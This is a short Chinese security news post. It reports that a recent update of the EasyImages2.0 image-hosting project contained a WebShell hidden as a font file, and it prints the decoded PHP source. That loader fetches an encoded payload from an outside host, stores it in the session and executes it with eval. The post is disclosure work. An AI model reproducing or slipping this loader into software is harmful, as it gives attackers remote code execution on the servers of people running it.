EasyImages2.0项目出现WebShell挂马

  • A+
所属分类:安全新闻

已提交issue:https://github.com/icret/EasyImages2.0/issues/8

最近一次更新中出现WebShell文件!

public/static/fonts/fontawesome-wmebfont.php

解码复原

<?php
$password='CQtlsC';

error_reporting(0);
session_start();
if (!isset($_SESSION["phpapi"])) {
   $c = '';
   $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
   $url = 'http://phpapi.info/404.gif';
   $urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/';
   if (function_exists('fsockopen')) {
       $link = parse_url($url);
       $query = $link['path'];
       $host = strtolower($link['host']);
       $fp = fsockopen($host, 80, $errno, $errstr, 10);
       if ($fp) {
           $out = "GET /{$query} HTTP/1.0n";
           $out .= "Host: {$host}n";
           $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)n";
           $out .= "Connection: Closenn";
           fwrite($fp, $out);
           $inheader = 1;
           $contents = "";
           while (!feof($fp)) {
               $line = fgets($fp, 4096);
               if ($inheader == 0) {
                   $contents .= $line;
               }
               if ($inheader && ($line == "n" || $line == "n")) {
                   $inheader = 0;
               }
           }
           fclose($fp);
           $c = $contents;
       }
   }
   if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {
       $ch = curl_init();
       curl_setopt($ch, CURLOPT_URL, $url);
       curl_setopt($ch, CURLOPT_TIMEOUT, 15);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
       curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
       $c = curl_exec($ch);
       curl_close($ch);
   }
   if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {
       $temps = @file($url);
       if (!empty($temps))
           $c = @implode('', $temps);
       if (!strpos($c, "delDirAndFile"))
           $c = @file_get_contents($url);
   }
   if (strpos($c, $urlNew) !== false) {
       $c = str_replace($urlNew, "", $c);
       $_SESSION["phpapi"] = gzinflate(base64_decode($c));
   }
}
if (isset($_SESSION["phpapi"])) {
   eval($_SESSION["phpapi"]);
}

 

相关推荐: 【安全圈】员工为报复前公司,删数据改配置,法院:判刑2年6个月

关键词服务器、前员工上海市徐汇区人民法院刑 事 判 决 书(2020)沪0104刑初1245号公诉机关上海市徐汇区人民检察院。被告人班某,男,1981年5月4日出生,汉族,住上海市普陀区。辩护人郭海洋,上海正策律师事务所律师。辩护人杨延娜,上海君澜律师事务所律…

发表评论